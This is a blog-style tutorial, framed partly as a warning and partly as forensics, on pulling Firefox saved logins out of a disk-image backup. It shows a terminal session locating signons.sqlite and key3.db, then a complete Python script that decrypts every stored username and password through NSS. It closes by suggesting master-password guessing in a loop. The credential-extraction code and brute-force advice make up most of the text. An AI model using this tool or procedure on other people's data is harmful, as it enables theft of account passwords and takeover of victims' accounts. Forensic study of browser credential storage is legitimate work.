Recovering Browser stored credentials from Hard Drive Backup
If you rely on the "Remember password" facility of your browser, this post should worry you. Suppose we have a compressed backup of a hard-drive partition:
gr00ve_hack3r@Magnum-Opus:/tmp/exp# file userpart.gz.dd
userpart.gz.dd: gzip compressed data, from Unix, last modified: Thu Oct 7 09:11:26 2010
gr00ve_hack3r@Magnum-Opus:/tmp/exp# mv userpart.gz.dd userpart.dd.gz
gr00ve_hack3r@Magnum-Opus:/tmp/exp# gunzip userpart.dd.gz
gr00ve_hack3r@Magnum-Opus:/tmp/exp# ls -l
total 48129
-rwxrw-rw- 1 root root 49283072 2013-03-28 10:39 userpart.dd
gr00ve_hack3r@Magnum-Opus:/tmp/exp# file userpart.dd
userpart.dd: Linux rev 1.0 ext3 filesystem data, UUID=4a6b1170-0250-4b03-96b7-22dd7b432002 (needs journal recovery)
gr00ve_hack3r@Magnum-Opus:/tmp/exp# mount -o loop userpart.dd mount_here/
gr00ve_hack3r@Magnum-Opus:/tmp/exp# ls -l mount_here/
total 13
drwxr-xr-x 26 postgres postgres 1024 2010-10-07 09:01 hacker
drwx------ 2 root root 12288 2010-10-07 05:03 lost+found
gr00ve_hack3r@Magnum-Opus:/tmp/exp# cd mount_here/hacker/
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker# ls
Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker# ls -la
total 66
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .config  .dbus  Desktop  .dmrc  Documents  Downloads  .esd_auth  examples.desktop  .gconf  .gconfd  .gnome2  .gnome2_private  .gtk-bookmarks  .gvfs  .ICEauthority  .icons  .local  .mozilla  Music  .nautilus  Pictures  .profile  Public  .pulse  .pulse-cookie  .sudo_as_admin_successful  Templates  .themes  .thumbnails  .update-notifier  .vboxclient-clipboard.pid  .vboxclient-display.pid  .vboxclient-seamless.pid  Videos  .xsession-errors  .xsession-errors.old
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker# cd .mozilla/
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla# ls
extensions firefox
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla# cd firefox/
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla/firefox# ls
42zgnxx7.default profiles.ini
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla/firefox# cd 42zgnxx7.default/
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla/firefox/42zgnxx7.default# ls
bookmarkbackups  bookmarks.html  Cache  cert8.db  chrome  compatibility.ini  compreg.dat  content-prefs.sqlite  cookies.sqlite  cookies.sqlite-journal  downloads.sqlite  extensions  extensions.cache  extensions.ini  extensions.rdf  formhistory.sqlite  key3.db  localstore.rdf  lock  mimeTypes.rdf  OfflineCache  permissions.sqlite  places.sqlite  places.sqlite-journal  pluginreg.dat  prefs.js  search.json  search.sqlite  secmod.db  signons.sqlite  urlclassifier3.sqlite  urlclassifierkey3.txt  webappsstore.sqlite  XPC.mfasl  xpti.dat  XUL.mfasl
signons.sqlite and key3.db are the two files we need. signons.sqlite holds the saved logins (the moz_logins table: hostname, encryptedUsername and encryptedPassword, the last two stored base64-encoded), and key3.db is the NSS key database holding the 3DES key that encrypted them. That key is itself protected by the Firefox master password. If the user never set one, which is the default, it is protected by an empty password, so with both files in hand you effectively hold the ciphertext and the key, and the logins decrypt immediately through NSS. If a master password was set you still have to guess it, but key3.db lets you test candidates offline at full speed. Copy the two files out of the image and work on the copies; mounting the image read-only (`-o ro,loop,noload`) also stops the pending journal recovery from modifying your evidence.
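The decryption step, as an added example that is not part of the original post: it reads the SDR-encrypted rows out of signons.sqlite, shows what is inside each base64 blob (key id, cipher OID, IV, ciphertext) with a small DER parser, and then hands the blob to NSS's PK11SDR_Decrypt through ctypes, which is exactly what Firefox does when it fills a form. Assumptions: libnss3.so is installed and can still open the legacy dbm key3.db (for a modern profile the key is in key4.db and NSS_Init wants a "sql:" prefix on the path); the sample blob and in-memory login table are constructed here for offline testing and are not real Firefox data.

```python
#!/usr/bin/env python3
"""Decrypt Firefox saved logins from a profile holding signons.sqlite + key3.db.
Added example, not the original post's code. Assumes libnss3.so (legacy dbm)."""
import base64
import ctypes
import sqlite3
import sys
from ctypes import POINTER, Structure, byref, c_char_p, c_int, c_uint, c_void_p

# --- signons.sqlite: only encType=1 rows are SDR-encrypted ----------------
def read_logins(conn):
    rows = conn.execute("SELECT hostname, encryptedUsername, encryptedPassword,"
                        " encType FROM moz_logins")
    return [{"hostname": h, "user": u, "password": p}
            for h, u, p, enc in rows if enc == 1]

def read_signons(db_path):
    with sqlite3.connect(db_path) as conn:
        return read_logins(conn)

# --- the blob: base64(DER SEQUENCE{ OCTET STRING keyId,
#        SEQUENCE{ OID alg, OCTET STRING iv }, OCTET STRING ciphertext })
def _tlv(buf, pos):                       # minimal DER tag/length/value reader
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                     # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _oid_str(raw):                        # DER OID bytes -> dotted string
    arcs, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def parse_sdr_blob(b64):
    tag, body, _ = _tlv(base64.b64decode(b64), 0)
    if tag != 0x30:
        raise ValueError("not a PK11SDR blob")
    _, key_id, pos = _tlv(body, 0)        # which key in key3.db was used
    _, alg, pos = _tlv(body, pos)
    _, oid, apos = _tlv(alg, 0)
    _, iv, _ = _tlv(alg, apos)
    _, ct, _ = _tlv(body, pos)
    return {"key_id": key_id, "alg": _oid_str(oid), "iv": iv, "ciphertext": ct}

# Constructed sample (not real data): key id f8..01, 3DES-CBC OID
# 1.2.840.113549.3.7, IV 00..07, sixteen 0x41 bytes as "ciphertext".
SAMPLE_BLOB = base64.b64encode(bytes.fromhex(
    "303a" "0410" "f800000000000000" "0000000000000001"
    "3014" "06082a864886f70d0307" "0408" "0001020304050607"
    "0410" + "41" * 16)).decode()

def sample_logins():                      # constructed signons.sqlite, in memory
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE moz_logins (id INTEGER PRIMARY KEY, hostname TEXT,"
                 " encryptedUsername TEXT, encryptedPassword TEXT, encType INTEGER)")
    conn.executemany("INSERT INTO moz_logins (hostname, encryptedUsername,"
                     " encryptedPassword, encType) VALUES (?,?,?,?)",
                     [("https://example.com", SAMPLE_BLOB, SAMPLE_BLOB, 1),
                      ("http://legacy.example", "plainuser", "plainpw", 0)])
    return read_logins(conn)

# --- NSS: let libnss3 unlock key3.db and run PK11SDR_Decrypt for us --------
class SECItem(Structure):
    _fields_ = [("type", c_int), ("data", c_void_p), ("len", c_uint)]

class NSSDecryptor:
    def __init__(self, profile_dir, master_password="", lib="libnss3.so"):
        self.nss = nss = ctypes.CDLL(lib)
        nss.NSS_Init.argtypes = [c_char_p]
        nss.PK11_GetInternalKeySlot.restype = c_void_p
        nss.PK11_CheckUserPassword.argtypes = [c_void_p, c_char_p]
        nss.PK11_FreeSlot.argtypes = [c_void_p]
        nss.PK11SDR_Decrypt.argtypes = [POINTER(SECItem), POINTER(SECItem), c_void_p]
        nss.SECITEM_ZfreeItem.argtypes = [POINTER(SECItem), c_int]
        if nss.NSS_Init(profile_dir.encode()) != 0:
            raise RuntimeError("NSS_Init failed; is key3.db in %s?" % profile_dir)
        self.slot = nss.PK11_GetInternalKeySlot()
        # "" is the no-master-password case (the default); anything else is a guess
        if nss.PK11_CheckUserPassword(self.slot, master_password.encode()) != 0:
            raise RuntimeError("master password rejected")

    def decrypt(self, b64):
        raw = base64.b64decode(b64)
        buf = ctypes.create_string_buffer(raw, len(raw))   # keep alive during call
        inp = SECItem(0, ctypes.addressof(buf), len(raw))
        out = SECItem(0, None, 0)
        if self.nss.PK11SDR_Decrypt(byref(inp), byref(out), None) != 0:
            raise RuntimeError("PK11SDR_Decrypt failed")
        plain = ctypes.string_at(out.data, out.len)
        self.nss.SECITEM_ZfreeItem(byref(out), 0)
        return plain.decode("utf-8", "replace")

    def close(self):
        self.nss.PK11_FreeSlot(self.slot)
        self.nss.NSS_Shutdown()

if __name__ == "__main__":                # usage: decrypt.py <profile copy> [master pw]
    profile = sys.argv[1]
    dec = NSSDecryptor(profile, sys.argv[2] if len(sys.argv) > 2 else "")
    for login in read_signons(profile + "/signons.sqlite"):
        print(login["hostname"], dec.decrypt(login["user"]), dec.decrypt(login["password"]))
    dec.close()
```

Run it against a copy of the profile directory pulled off the mounted image (the `42zgnxx7.default` directory above). If NSS_Init fails, the copy is missing key3.db or the installed NSS no longer reads the dbm format; if PK11_CheckUserPassword fails with the empty string, a master password was set and you are back to guessing it, which the same call lets you do in a loop.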